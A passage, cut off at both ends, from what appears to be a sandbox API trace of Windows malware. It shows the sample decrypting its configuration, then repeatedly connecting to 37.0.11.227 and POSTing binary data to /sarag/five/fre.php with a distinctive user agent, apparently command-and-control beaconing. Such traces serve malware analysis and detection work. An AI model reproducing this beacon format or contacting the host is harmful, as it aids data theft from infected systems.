(Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0199.040] GetProcessHeap () returned 0x690000 [0199.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0199.040] GetProcessHeap () returned 0x690000 [0199.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0199.041] GetProcessHeap () returned 0x690000 [0199.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0199.041] GetProcessHeap () returned 0x690000 [0199.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0199.041] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0199.042] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0199.042] GetProcessHeap () returned 0x690000 [0199.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a91a8 [0199.042] GetProcessHeap () returned 0x690000 [0199.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0199.043] send (s=0x424, buf=0x6a91a8*, len=242, flags=0) returned 242 [0199.043] send (s=0x424, buf=0x6aba40*, len=159, flags=0) returned 159 [0199.043] GetProcessHeap () returned 0x690000 [0199.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0199.043] recv (in: s=0x424, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0199.127] GetProcessHeap () returned 0x690000 [0199.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0199.128] GetProcessHeap () returned 0x690000 [0199.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0199.128] GetProcessHeap () returned 0x690000 [0199.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0199.129] GetProcessHeap () returned 0x690000 [0199.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0199.129] closesocket (s=0x424) returned 0 [0199.130] GetProcessHeap () returned 0x690000 [0199.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0199.130] GetProcessHeap () returned 0x690000 [0199.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0199.130] GetProcessHeap () returned 0x690000 [0199.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0199.131] GetProcessHeap () returned 0x690000 [0199.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0199.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x125c) returned 0x424 [0199.133] Sleep (dwMilliseconds=0xea60) [0199.134] GetProcessHeap () returned 0x690000 [0199.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0199.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.135] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.160] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0199.190] GetProcessHeap () returned 0x690000 [0199.190] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0199.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.191] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0199.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.191] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.192] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.192] GetProcessHeap () returned 0x690000 [0199.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0199.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.195] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0199.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.196] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0199.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.197] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0199.197] GetProcessHeap () returned 0x690000 [0199.197] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0199.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.198] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0199.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.199] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0199.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.200] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0199.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.200] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0199.200] GetProcessHeap () returned 0x690000 [0199.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0199.200] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0199.201] GetProcessHeap () returned 0x690000 [0199.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0199.201] GetProcessHeap () returned 0x690000 [0199.201] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0199.201] GetProcessHeap () returned 0x690000 [0199.202] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0199.202] GetProcessHeap () returned 0x690000 [0199.202] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0199.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.204] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.212] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0199.219] GetProcessHeap () returned 0x690000 [0199.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0199.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.220] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0199.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.221] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.222] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.222] GetProcessHeap () returned 0x690000 [0199.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0199.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.223] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0199.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.224] CryptDestroyKey (hKey=0x69d028) returned 1 [0199.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.225] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0199.225] GetProcessHeap () returned 0x690000 [0199.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0199.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.230] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0199.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.231] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0199.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.231] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0199.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.232] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0199.232] GetProcessHeap () returned 0x690000 [0199.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0199.232] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2970*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae958*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0199.232] GetProcessHeap () returned 0x690000 [0199.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0199.232] socket (af=2, type=1, protocol=6) returned 0x428 [0199.233] connect (s=0x428, name=0x6ae958*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0199.262] FreeAddrInfoW (pAddrInfo=0x6b2970*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae958*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0199.262] GetProcessHeap () returned 0x690000 [0199.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0199.262] GetProcessHeap () returned 0x690000 [0199.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0199.262] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0199.263] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0199.263] GetProcessHeap () returned 0x690000 [0199.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0199.263] GetProcessHeap () returned 0x690000 [0199.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0199.264] GetProcessHeap () returned 0x690000 [0199.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0199.264] GetProcessHeap () returned 0x690000 [0199.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0199.265] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0199.265] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0199.265] GetProcessHeap () returned 0x690000 [0199.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0199.265] GetProcessHeap () returned 0x690000 [0199.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0199.266] send (s=0x428, buf=0x6abd08*, len=242, flags=0) returned 242 [0199.267] send (s=0x428, buf=0x6aba40*, len=159, flags=0) returned 159 [0199.267] GetProcessHeap () returned 0x690000 [0199.267] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0199.267] recv (in: s=0x428, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0199.340] GetProcessHeap () returned 0x690000 [0199.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0199.340] GetProcessHeap () returned 0x690000 [0199.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0199.341] GetProcessHeap () returned 0x690000 [0199.341] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0199.341] GetProcessHeap () returned 0x690000 [0199.341] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0199.341] closesocket (s=0x428) returned 0 [0199.342] GetProcessHeap () returned 0x690000 [0199.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0199.343] GetProcessHeap () returned 0x690000 [0199.343] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0199.343] GetProcessHeap () returned 0x690000 [0199.343] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0199.343] GetProcessHeap () returned 0x690000 [0199.344] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0199.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1278) returned 0x428 [0199.346] Sleep (dwMilliseconds=0xea60) [0199.350] GetProcessHeap () returned 0x690000 [0199.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0199.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.351] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.358] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0199.363] GetProcessHeap () returned 0x690000 [0199.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0199.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.364] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0199.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.366] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.367] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.367] GetProcessHeap () returned 0x690000 [0199.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0199.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.369] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0199.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.372] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0199.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.372] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0199.372] GetProcessHeap () returned 0x690000 [0199.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0199.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.373] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0199.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.374] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0199.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.375] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0199.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.376] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0199.376] GetProcessHeap () returned 0x690000 [0199.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0199.376] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0199.376] GetProcessHeap () returned 0x690000 [0199.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0199.377] GetProcessHeap () returned 0x690000 [0199.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0199.380] GetProcessHeap () returned 0x690000 [0199.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0199.382] GetProcessHeap () returned 0x690000 [0199.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0199.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.384] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.389] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0199.396] GetProcessHeap () returned 0x690000 [0199.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0199.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.397] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0199.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.398] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.399] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.399] GetProcessHeap () returned 0x690000 [0199.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0199.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.401] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0199.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.401] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0199.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.402] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0199.402] GetProcessHeap () returned 0x690000 [0199.402] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0199.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.403] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0199.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.404] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0199.405] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.405] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0199.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.407] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0199.407] GetProcessHeap () returned 0x690000 [0199.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0199.407] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2b00*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0199.407] GetProcessHeap () returned 0x690000 [0199.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0199.407] socket (af=2, type=1, protocol=6) returned 0x42c [0199.407] connect (s=0x42c, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0199.432] FreeAddrInfoW (pAddrInfo=0x6b2b00*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0199.432] GetProcessHeap () returned 0x690000 [0199.432] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0199.432] GetProcessHeap () returned 0x690000 [0199.432] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0199.432] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0199.433] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0199.433] GetProcessHeap () returned 0x690000 [0199.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0199.433] GetProcessHeap () returned 0x690000 [0199.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0199.434] GetProcessHeap () returned 0x690000 [0199.434] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0199.434] GetProcessHeap () returned 0x690000 [0199.434] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0199.435] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0199.435] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0199.435] GetProcessHeap () returned 0x690000 [0199.435] RtlAllocateHeap 